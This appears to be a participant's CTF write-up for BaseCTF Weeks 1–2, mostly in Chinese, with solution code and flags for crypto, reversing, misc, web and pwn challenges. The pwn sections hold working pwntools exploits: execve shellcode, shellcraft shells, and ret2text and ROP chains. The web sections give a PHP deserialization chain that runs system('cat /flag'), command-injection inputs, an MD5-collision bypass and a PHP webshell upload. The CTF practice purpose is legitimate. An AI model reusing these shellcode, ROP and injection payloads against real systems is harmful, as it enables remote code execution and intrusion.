assert n == cal_n
import gmpy2
# import libnum
from Crypto.Util.number import *
# new_list 偏历,挨个-1的结果 相乘
phi = 1
# 欧拉函数怎么算
# 计算数组new_list中重复个数
for i in new_list:
if new_list.count(i) > 1:
phi *= i ** (new_list.count(i) - 1) * (i - 1)
else:
phi *= (i - 1)
# for i in new_list:
# phi *= (i - 1)
print('phi', phi)
### e phi 不互素情况下 e//t 否则可以直接接d=gmpy2.invert(e , phi)
t = gmpy2.gcd(e, phi)
print('t', t)
d = int(gmpy2.invert(e // t, phi))
print('d=', d)
###
m = pow(c, d, n)
print('c=', c)
print('n=', n)
print('m=', m)
print(hex(m))
# print(libnum.n2s(m))
print('m =', long_to_bytes(m))
# print(libnum.n2s(int(m)).decode())
# python2
# print str(hex(m)[2:-1]).decode('hex')
print('-----------')
pwn
[Week2] shellcode_level1
直接调syscall
from pwn import *
binary = './attachment'
elf = ELF(binary)
context(log_level='debug', arch=elf.arch, os='linux', binary=binary)
s = remote('challenge.basectf.fun', 39375)
r = asm('syscall')
s.send(r)
shellcode = asm(shellcraft.sh())
s.send(r + shellcode)
s.interactive()
web
[Week2] Really EZ POP
<?php
class Sink
{
private $cmd = 'echo 123;';
public function __construct()
{
$this->cmd = 'system("cat /flag");';
}
public function __toString()
{
eval($this->cmd);
}
}
class Shark
{
private $word;
public function __construct()
{
$this->word = new Sink();
}
public function __invoke()
{
echo 'Shark says:' . $this->word;
}
}
class Sea
{
public $animal;
public function __get($name)
{
$sea_ani = $this->animal;
echo 'In a deep deep sea, there is a ' . $sea_ani();
}
}
class Nature
{
public $sea;
public function __destruct()
{
echo $this->sea->see;
}
}
if ($_POST['nature']) {
$nature = unserialize($_POST['nature']);
}
$start = new Nature();
$start->sea = new Sea();
$start->sea->animal = new Shark();
$payload = serialize($start);
echo base64_encode($payload);
[Week2] RCEisamazingwithspace
cmd=cat</flag
[Week2] 你听不到我的声音
http://challenge.basectf.fun:43174/flag
BaseCTF{f136e3c8-c1cc-4576-bce7-86cc71bf8f90}
POST / HTTP/1.1
Host: challenge.basectf.fun:43174
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
cmd=cp%20%2fflag%20flag
[Week2] 一起吃豆豆
BaseCTF{J5_gam3_1s_easy_t0_h4ck!!}
//游戏结束
stage.createItem({
x: game.width / 2,
y: game.height * .35,
draw: function (context) {
context.fillStyle = '#FFF';
context.font = 'bold 20px PressStart2P';
context.textAlign = 'center';
context.textBaseline = 'middle';
context.fillText(_LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER', this.x, this.y);
}
});
[Week2] ez_ser
BaseCTF{1ab1664b-3e08-4e93-96ca-76c06784babf}
$ser=new web();
$ser->kw=new re();
$ser->kw->chu0=new pwn();
$ser->kw->chu0->dusk="gods";
$ser->kw->chu0->over=new Misc();
$data = serialize($ser);
echo("\n");
echo $data;
echo("\n");
echo("\n");
echo urlencode($data);
echo("\n");
[Week2] Happy Birthday
D:\NewCtfApps\fastcoll_v1.0.0.5.exe -o 1.pdf 2.pdf
Week1
官方wp https://j0zr0js7k7j.feishu.cn/docx/U2dVdIOTCoLrp9xaYCrcEEbkndh?from=from_copylink
re
Upx mini
upx -d file.exe
QmFzZUNURntIYXYzX0BfZzBvZF90MW0zISEhfQ==
解码
You are good at ida.exe
函数里第一部分在main
第二部分在Second
第三部分在Interesting
Y0u_4Re_900d_47_id4
xor
key = bytes.fromhex('586E705B6B775E687A51657954627C577F634A7C664D796540766843')
enc = bytes.fromhex('01090525262D0B1D247A31201E493D674D5008252E6E053422403B25')
for i, k in enumerate(key):
c1 = key[28 - i - 1]
print(chr(c1 ^ enc[i]),end='')
easy_maze
x$$$$$$$$$$$$$$
......$$$$$$$$$
.$.$$.$$.....$$
.$.$$$..$$$$.$$
.$$$...$$$$$.$$
.$$$.$..$.$$$$$
.$$$.$.$$...$$$
.....$....$.$$$
$$$$$$......$$$
$$$$$$.$$$$$$$$
$$$....$$...$$$
$$$.......$$$$$
$$$$$$$$$.$$.$$
$$$$$$$$$.$.$$$
$$$$$$........y
路径
sssssssddddwwwddsssssssdddsssddddd
'plz BaseCTF{lower.MD5{your path}} by 32bit',0
BaseCTF{131b7d6e60e8a34cb01801ae8de07efe}
BasePlus
lvfzBiZiOw7<lhF8dDOfEbmI]i@bdcZfEc^z>aD!
使用Cyberchef ,magic 秒解
BaseCTF{BA5e_DEcoD1N6_sEcr3t}
Misc
base
KFWUM6S2KVHFKUTOOQZVUVCGNJGUOMLMLAZVE5SYGJETAYZSKZVGIR22HE======
使用Cyberchef ,magic 秒解
BaseCTF{we1c0me_to_b4sectf}
x 你也喜欢圣物吗?
图片末尾RE9fWU9VX0tOT1dfRVpfTFNCPw==
DO_YOU_KNOW_EZ_LSB?
lsb得到
b1,rgb,lsb,xy .. text: "key=lud1_lud1"
解压得到 it is fake.zip
题目提示:
where_is_key.zip真的需要密码,再找找
看到假flag的同时,真flag已经出来了,再看看
用每个解压工具解,最后 bandizip成功解压。
根本进不去啊!
题目提示: 这个子域名没有绑定 A 解析到一个IP
dig txt flag.basectf.fun
海上遇到了鲨鱼
导出http
flag.php有逆序的flag
正着看还是反着看呢?
将文件字节逆序,末尾提取zip解压得flag
BaseCTF{h3ll0_h4cker}
人生苦短,我用Python
import base64
import hashlib
flag = ['$'] * 38
flag[:len('BaseCTF{')] = 'BaseCTF{'
flag[10:12] = 'Mp'
flag[-3:] = '3x}'
flag[8] = 's'
flag[12:32:4] = 'lsT_n'
flag[-11] = '4'
# lst = [14, 2, 6, 4, 8]
_lst = [14, 17, 24, 29]
for i in _lst:
flag[i] = '_'
flag[-7:-3] = base64.b64decode(b'MG1QbA==').decode()
flag[::-7] = bytes.fromhex('7d4372733173').decode()
flag[21:27] = bytes([116, 51, 114, 95, 84, 104]).decode()
flag[13] = '3'
flag[15] = '1'
from itertools import product
import string
dic = string.printable
for tp in product(dic, repeat=2):
password = ''.join(tp)
s = 0
# for idx, c in enumerate(flag[17:20]):
for idx, c in enumerate('_' + password):
s += ord(c) * 2024_08_15 ** idx
if s == 41378751114180610:
flag[18:20] = password
print(''.join(flag))
web
[Week1] HTTP 是什么呀
POST /?basectf=we1c%2500me HTTP/1.1
Host: challenge.basectf.fun:24925
Upgrade-Insecure-Requests: 1
User-Agent: Base
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie:c00k13=i can't eat it
Referer:Base
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Base=fl@g
[Week1] 喵喵喵´•ﻌ•`
[http://challenge.basectf.fun:36854/?DT=system('cat /flag');](http://challenge.basectf.fun:36854/?DT=system('cat /flag')😉
[Week1] md5绕过欸
POST /?name=QNKCDZO&name2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 HTTP/1.1
Host: challenge.basectf.fun:42219
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
password=240610708&password2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
[Week1] A Dark Room
[Week1] upload
POST / HTTP/1.1
Host: challenge.basectf.fun:44920
Content-Length: 9773
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge.basectf.fun:44920
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykhdNxJMpFlddi1AA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://challenge.basectf.fun:44920/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarykhdNxJMpFlddi1AA
Content-Disposition: form-data; name="file"; filename="muma.php"
Content-Type: image/jpeg
...
c4QESl٫��
------WebKitFormBoundarykhdNxJMpFlddi1AA--
CRY
[Week1] helloCrypto
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
key1 = 208797759953288399620324890930572736628
key = long_to_bytes(key1)
my_aes=AES.new(key=key,mode=AES.MODE_ECB)
c = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'
print(my_aes.decrypt(c))
BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}
[Week1] ez_math
[Week1] 你会算md5吗
import hashlib
import string
output = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']
db = {}
for i in string.printable:
my_md5=hashlib.md5()
my_md5.update(i.encode())
db[i] = my_md5.hexdigest()
print(db)
result = ""
for item in output:
for c in string.printable:
if db[c] == item:
result += c
print(result)
# BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}
[Week1] babypack
flagmm=''
for k in a:
if k<c :
c=c-k
# print(c)
flagmm = flagmm + '1'
else:
flagmm=flagmm+'0'
print(flagmm)
[Week1] babyrsa
d = mod_inverse(e, n-1)
# 解密消息
m = pow(c, d, n)
# 将整数 m 转换为字节串
def long_to_bytes(m):
return m.to_bytes((m.bit_length() + 7) // 8, 'big')
flag = long_to_bytes(m)
[Week1] 十七倍
for one in cipher:
for i in range(256):
flag=one+256*i
# 判断能整除17
if flag%17==0 and flag//17 <256:
flag=flag//17
print(chr(flag),end="")
[Week1] ez_rsa
sage解方程组算qp
var('q p')
n=p*q==96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
not_phi=(p+2)*(q+2)==96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205
solve([n, not_phi], p,q)
PWN
[Week1] 签个到吧
from pwn import *
remote_host,remote_port="challenge.basectf.fun", 41115
r = remote(remote_host, remote_port)
if __name__ == '__main__':
r.interactive()
# BaseCTF{c2ccb761-9595-4d84-8d36-8d34fd07ee72}
[Week1] echo
/flag
# 我也不知道为什么这么搞,反正成功了
BaseCTF{fbaef266-94b9-47f9-8e68-da0250d5eadd}
[Week1] Ret2text
from pwn import *
remote_host, remote_port = "challenge.basectf.fun", 36547
r = remote(remote_host, remote_port)
p = b"A" * 0x20
p += p64(0xdeedbeef)
p += p64(0x000000000040101a)
p += p64(0x4011A8)
input()
r.sendline(p)
r.interactive()
BaseCTF{c417a22c-0d0f-4fc9-b6bb-e7d7da1eeaf4}
[Week1] shellcode_level0
from pwn import *
remote_host, remote_port = "challenge.basectf.fun", 43556
r = remote(remote_host, remote_port)
r.recvuntil(b"please input shellcode: ")
input()
p = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
r.sendline(p)
r.interactive()
BaseCTF{1e317c52-cc9a-4009-bc7f-b999cc9624f3}
[Week1] 我把她丢了
r.recvuntil('I lost her, what should I do? Help me find her.\n')
# 0x0000000000401196 : pop rdi ; ret
# bin_sh 0x0000000000402008
# system 0x0000000000401080
p = b"A" * 0x70
p += p64(0xdeedbeef)
p += p64(0x000000000040101a)
p += p64(0x0000000000401196)
p += p64(0x0000000000402008)
p += p64(0x0000000000401080)
# p += elf.got['system']
input()
r.sendline(p)
r.interactive()
